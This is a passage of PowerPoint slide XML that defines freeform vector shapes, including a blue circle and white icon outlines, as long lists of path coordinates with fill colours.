                    <a:pt x="818" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="900" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="109"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="988" h="905">
                  <a:moveTo>
                    <a:pt x="326" y="446"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="326" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316" y="428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300" y="390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286" y="350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326" y="446"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="988" h="905">
                  <a:moveTo>
                    <a:pt x="304" y="70"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307" y="170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381" y="423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401" y="450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424" y="450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424" y="450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427" y="447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429" y="444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430" y="440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431" y="436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431" y="428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378" y="321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371" y="300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352" y="212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350" y="189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337" y="54"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="70"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8308086" y="1554861"/>
            <a:ext cx="1096423" cy="1096804"/>
            <a:chOff x="8308086" y="1554861"/>
            <a:chExt cx="1096423" cy="1096804"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8308086" y="1554861"/>
              <a:ext cx="1096423" cy="1096804"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1482" h="1482">
                  <a:moveTo>
                    <a:pt x="1482" y="742"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1481" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1478" y="818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473" y="854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467" y="890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458" y="926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436" y="997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423" y="1029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392" y="1094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375" y="1126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="1155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1334" y="1185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313" y="1213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1289" y="1240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239" y="1290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1212" y="1313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185" y="1335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155" y="1356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1125" y="1375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094" y="1393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062" y="1409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996" y="1437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="1449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890" y="1467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853" y="1473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817" y="1479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779" y="1481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741" y="1482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741" y="1482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703" y="1481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665" y="1479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628" y="1473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="1467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="1449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487" y="1437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419" y="1409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="1393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356" y="1375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="1356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="1335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="1313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242" y="1290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="1240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="1213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="1185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="1155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="1126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="1094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="1029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1125" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1212" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1289" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1334" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467" y="592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1478" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1481" y="704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8540305" y="1698403"/>
              <a:ext cx="653987" cy="899922"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="885" h="1217">
                  <a:moveTo>
                    <a:pt x="212" y="796"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125" y="1151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="1154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178" y="783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149" y="769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117" y="744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="96"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245" y="77"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561" y="46"/>
